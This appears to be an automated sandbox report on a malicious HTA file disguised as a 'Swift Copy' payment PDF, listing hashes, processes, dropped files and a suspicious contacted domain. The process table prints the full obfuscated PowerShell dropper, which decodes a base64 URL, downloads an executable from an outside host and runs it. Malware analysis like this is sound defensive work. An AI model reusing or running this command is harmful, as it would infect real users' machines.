File name: | Swift Copyusd180000_pdf.hta |
Full analysis: | https://app.any.run/tasks/9cef94c6-0285-48f8-bb0c-c23c486fde0b |
Verdict: | Malicious activity |
Analysis date: | July 11, 2019, 12:46:09 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/html |
File info: | HTML document, ASCII text, with very long lines, with CRLF, LF line terminators |
MD5: | 4649EE06E336170FD843122B15C3C0F5 |
SHA1: | E3FA0077A75AA0BAFCEEADA1A7857E99FC2B3BE3 |
SHA256: | 93BA9C1B36188A646B638834E3B323A94B3F8CB037C4399183D77865D4904C70 |
SSDEEP: | 384:xlJTuIXBrLlJTuIXBrVzlJTuIXBrJ9QlJTuIXBrgNsSIdvlJTuIXBrklJTuIXBrr:bJTvXBrJJTvXBrVhJTvXBrJ9EJTvXBro |
.html | | | HyperText Markup Language (100) |
---|
ContentType: | text/html; charset=utf-8 |
---|
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3040 | "C:\Windows\System32\mshta.exe" "C:\Users\admin\AppData\Local\Temp\Swift Copyusd180000_pdf.hta" | C:\Windows\System32\mshta.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
2516 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$mogkues = Get-Random -Min 3 -Max 4;$mstfnpdxlqb = ([char[]]([char]97..[char]122));$xdvjgkn = -join ($mstfnpdxlqb | Get-Random -Count $mogkues | % {[Char]$_});$kydajzpsbc = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$oupiezbyv = $xdvjgkn + $kydajzpsbc;$yblvqjnguze=[char]0x53+[char]0x61+[char]0x4c;$qcuiev=[char]0x49+[char]0x45+[char]0x58;$czmajniwr=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL jbgnfahpd $yblvqjnguze;$zswbftl=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;jbgnfahpd aypskwmvhq $qcuiev;$bcofzydnte=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|aypskwmvhq;jbgnfahpd nrlqzad $czmajniwr;$wirnpmx = $bcofzydnte + [char]0x5c + $oupiezbyv;$uyhdokji = $xdvjgkn + '';$stzeijykhof = '';$stzeijykhof = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($stzeijykhof));$tewfaxgz = $env:PUBLIC + [char]0x5c + $uyhdokji;$zswbftl=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;$suhvylewt = New-Object $zswbftl;try{$kfdteubny = $suhvylewt.DownloadData($stzeijykhof)}catch{[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$kfdteubny = $suhvylewt.DownloadData($stzeijykhof)};[IO.File]::WriteAllBytes($tewfaxgz, $kfdteubny);nrlqzad $tewfaxgz;;;;$nwmicpveoh = 'aHR0cDovL2FsaWlmZi5jb20vYXBwL3dlYnJvb3QvZGF0ZS9pbmsuZXhl';$nwmicpveoh=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($nwmicpveoh));$xbdakwmf = New-Object $zswbftl;$vgiobrhu = $xbdakwmf.DownloadData($nwmicpveoh);[IO.File]::WriteAllBytes($wirnpmx, $vgiobrhu);nrlqzad $wirnpmx;;$uhapsnvxky = @($hlrov, $fyokgwdp, $vtlxc, $tnurqdxfeg);foreach($hwvxok in $uhapsnvxky){$null 
= $_}"" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | mshta.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2516 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YB194TTTOK9865FEGLT6.temp | — | |
MD5:— | SHA256:— | |||
2516 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:53C936F15BA0E898CA1BDCEB3AE9C5FB | SHA256:D7C26FC9FF2065D126D4339D2C20D865B8B2A8399AB7F0A1A3B06F7AD1A36C95 | |||
2516 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF166c2c.TMP | binary | |
MD5:53C936F15BA0E898CA1BDCEB3AE9C5FB | SHA256:D7C26FC9FF2065D126D4339D2C20D865B8B2A8399AB7F0A1A3B06F7AD1A36C95 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2516 | powershell.exe | 95.168.186.145:80 | aliiff.com | — | NL | suspicious |
Domain | IP | Reputation |
---|---|---|
aliiff.com | | suspicious |